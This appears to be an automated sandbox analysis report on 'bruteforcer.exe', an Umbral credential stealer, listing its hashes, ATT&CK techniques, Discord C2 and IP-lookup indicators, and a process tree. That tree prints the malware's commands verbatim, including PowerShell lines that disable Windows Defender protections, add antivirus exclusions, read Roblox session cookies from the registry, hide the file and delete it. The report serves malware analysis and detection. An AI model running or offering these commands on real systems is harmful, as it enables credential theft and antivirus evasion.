umbral | 27fddb3ad83e8139d32ec09c8d6790b0ddd177c2e90f84f104c64010f91e4401

Analysis

max time kernel
95s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2024 10:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bruteforcer.exe
Size

231KB
MD5

1e2b102dcdabbee48cd1308fba1f6719
SHA1

b657cdb68bb499c81f3746965ce63db8b8da7017
SHA256

27fddb3ad83e8139d32ec09c8d6790b0ddd177c2e90f84f104c64010f91e4401
SHA512

7e46052ca1abddd8fc993034cca84fe5d0752629d571a1dd4292a97c6c2a56906a20b7a910d3519ef875dfc1864333d01a8e223c9f18fa7fedf78dd9cdc5408d
SSDEEP

6144:sloZML9EBw/S6NtFnEPfCJxg8JhAA1HM0ryurdEwZThANnp8e1mGRw:qoZhYS6NZLg8JhAA1HM0ryurdEwZTh8C

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/916-1-0x0000025C5E580000-0x0000025C5E5C0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3640	powershell.exe
2636	powershell.exe
2256	powershell.exe
2348	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	bruteforcer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1744	cmd.exe
832	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4328	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
832	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
916	bruteforcer.exe
3640	powershell.exe
3640	powershell.exe
2348	powershell.exe
2348	powershell.exe
2636	powershell.exe
2636	powershell.exe
1328	powershell.exe
1328	powershell.exe
2256	powershell.exe
2256	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	916	bruteforcer.exe
Token: SeIncreaseQuotaPrivilege	3496	wmic.exe
Token: SeSecurityPrivilege	3496	wmic.exe
Token: SeTakeOwnershipPrivilege	3496	wmic.exe
Token: SeLoadDriverPrivilege	3496	wmic.exe
Token: SeSystemProfilePrivilege	3496	wmic.exe
Token: SeSystemtimePrivilege	3496	wmic.exe
Token: SeProfSingleProcessPrivilege	3496	wmic.exe
Token: SeIncBasePriorityPrivilege	3496	wmic.exe
Token: SeCreatePagefilePrivilege	3496	wmic.exe
Token: SeBackupPrivilege	3496	wmic.exe
Token: SeRestorePrivilege	3496	wmic.exe
Token: SeShutdownPrivilege	3496	wmic.exe
Token: SeDebugPrivilege	3496	wmic.exe
Token: SeSystemEnvironmentPrivilege	3496	wmic.exe
Token: SeRemoteShutdownPrivilege	3496	wmic.exe
Token: SeUndockPrivilege	3496	wmic.exe
Token: SeManageVolumePrivilege	3496	wmic.exe
Token: 33	3496	wmic.exe
Token: 34	3496	wmic.exe
Token: 35	3496	wmic.exe
Token: 36	3496	wmic.exe
Token: SeIncreaseQuotaPrivilege	3496	wmic.exe
Token: SeSecurityPrivilege	3496	wmic.exe
Token: SeTakeOwnershipPrivilege	3496	wmic.exe
Token: SeLoadDriverPrivilege	3496	wmic.exe
Token: SeSystemProfilePrivilege	3496	wmic.exe
Token: SeSystemtimePrivilege	3496	wmic.exe
Token: SeProfSingleProcessPrivilege	3496	wmic.exe
Token: SeIncBasePriorityPrivilege	3496	wmic.exe
Token: SeCreatePagefilePrivilege	3496	wmic.exe
Token: SeBackupPrivilege	3496	wmic.exe
Token: SeRestorePrivilege	3496	wmic.exe
Token: SeShutdownPrivilege	3496	wmic.exe
Token: SeDebugPrivilege	3496	wmic.exe
Token: SeSystemEnvironmentPrivilege	3496	wmic.exe
Token: SeRemoteShutdownPrivilege	3496	wmic.exe
Token: SeUndockPrivilege	3496	wmic.exe
Token: SeManageVolumePrivilege	3496	wmic.exe
Token: 33	3496	wmic.exe
Token: 34	3496	wmic.exe
Token: 35	3496	wmic.exe
Token: 36	3496	wmic.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeIncreaseQuotaPrivilege	1964	wmic.exe
Token: SeSecurityPrivilege	1964	wmic.exe
Token: SeTakeOwnershipPrivilege	1964	wmic.exe
Token: SeLoadDriverPrivilege	1964	wmic.exe
Token: SeSystemProfilePrivilege	1964	wmic.exe
Token: SeSystemtimePrivilege	1964	wmic.exe
Token: SeProfSingleProcessPrivilege	1964	wmic.exe
Token: SeIncBasePriorityPrivilege	1964	wmic.exe
Token: SeCreatePagefilePrivilege	1964	wmic.exe
Token: SeBackupPrivilege	1964	wmic.exe
Token: SeRestorePrivilege	1964	wmic.exe
Token: SeShutdownPrivilege	1964	wmic.exe
Token: SeDebugPrivilege	1964	wmic.exe
Token: SeSystemEnvironmentPrivilege	1964	wmic.exe
Token: SeRemoteShutdownPrivilege	1964	wmic.exe
Token: SeUndockPrivilege	1964	wmic.exe
Token: SeManageVolumePrivilege	1964	wmic.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 916 wrote to memory of 3496	916	bruteforcer.exe	83
PID 916 wrote to memory of 3496	916	bruteforcer.exe	83
PID 916 wrote to memory of 5080	916	bruteforcer.exe	89
PID 916 wrote to memory of 5080	916	bruteforcer.exe	89
PID 916 wrote to memory of 3640	916	bruteforcer.exe	91
PID 916 wrote to memory of 3640	916	bruteforcer.exe	91
PID 916 wrote to memory of 2348	916	bruteforcer.exe	93
PID 916 wrote to memory of 2348	916	bruteforcer.exe	93
PID 916 wrote to memory of 2636	916	bruteforcer.exe	95
PID 916 wrote to memory of 2636	916	bruteforcer.exe	95
PID 916 wrote to memory of 1328	916	bruteforcer.exe	99
PID 916 wrote to memory of 1328	916	bruteforcer.exe	99
PID 916 wrote to memory of 1964	916	bruteforcer.exe	101
PID 916 wrote to memory of 1964	916	bruteforcer.exe	101
PID 916 wrote to memory of 3444	916	bruteforcer.exe	103
PID 916 wrote to memory of 3444	916	bruteforcer.exe	103
PID 916 wrote to memory of 3664	916	bruteforcer.exe	105
PID 916 wrote to memory of 3664	916	bruteforcer.exe	105
PID 916 wrote to memory of 2256	916	bruteforcer.exe	108
PID 916 wrote to memory of 2256	916	bruteforcer.exe	108
PID 916 wrote to memory of 4328	916	bruteforcer.exe	110
PID 916 wrote to memory of 4328	916	bruteforcer.exe	110
PID 916 wrote to memory of 1744	916	bruteforcer.exe	112
PID 916 wrote to memory of 1744	916	bruteforcer.exe	112
PID 1744 wrote to memory of 832	1744	cmd.exe	114
PID 1744 wrote to memory of 832	1744	cmd.exe	114

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5080	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bruteforcer.exe
"C:\Users\Admin\AppData\Local\Temp\bruteforcer.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:916
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3496
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\bruteforcer.exe"
  2⤵
  - Views/modifies file attributes
  PID:5080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bruteforcer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:3444
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2256
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4328
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\bruteforcer.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
227556da5e65f6819f477756808c17e4

SHA1
6ffce766e881ca2a60180bb25f4981b183f78279

SHA256
101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4

SHA512
d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6317adf4fbc43ea2fd68861fafd57155

SHA1
6b87c718893c83c6eed2767e8d9cbc6443e31913

SHA256
c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

SHA512
17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bx3ld2gx.oe4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/916-71-0x0000025C78C50000-0x0000025C78C5A000-memory.dmp

Filesize
40KB

Download
memory/916-35-0x0000025C78C60000-0x0000025C78C7E000-memory.dmp

Filesize
120KB

Download
memory/916-90-0x00007FF88A010000-0x00007FF88AAD1000-memory.dmp

Filesize
10.8MB

Download
memory/916-72-0x0000025C78CA0000-0x0000025C78CB2000-memory.dmp

Filesize
72KB

Download
memory/916-2-0x00007FF88A010000-0x00007FF88AAD1000-memory.dmp

Filesize
10.8MB

Download
memory/916-33-0x0000025C78CC0000-0x0000025C78D36000-memory.dmp

Filesize
472KB

Download
memory/916-34-0x0000025C78D40000-0x0000025C78D90000-memory.dmp

Filesize
320KB

Download
memory/916-1-0x0000025C5E580000-0x0000025C5E5C0000-memory.dmp

Filesize
256KB

Download
memory/916-0-0x00007FF88A013000-0x00007FF88A015000-memory.dmp

Filesize
8KB

Download
memory/3640-15-0x00007FF88A010000-0x00007FF88AAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3640-14-0x00007FF88A010000-0x00007FF88AAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3640-3-0x00007FF88A010000-0x00007FF88AAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3640-11-0x000002306F750000-0x000002306F772000-memory.dmp

Filesize
136KB

Download
memory/3640-18-0x00007FF88A010000-0x00007FF88AAD1000-memory.dmp

Filesize
10.8MB

Download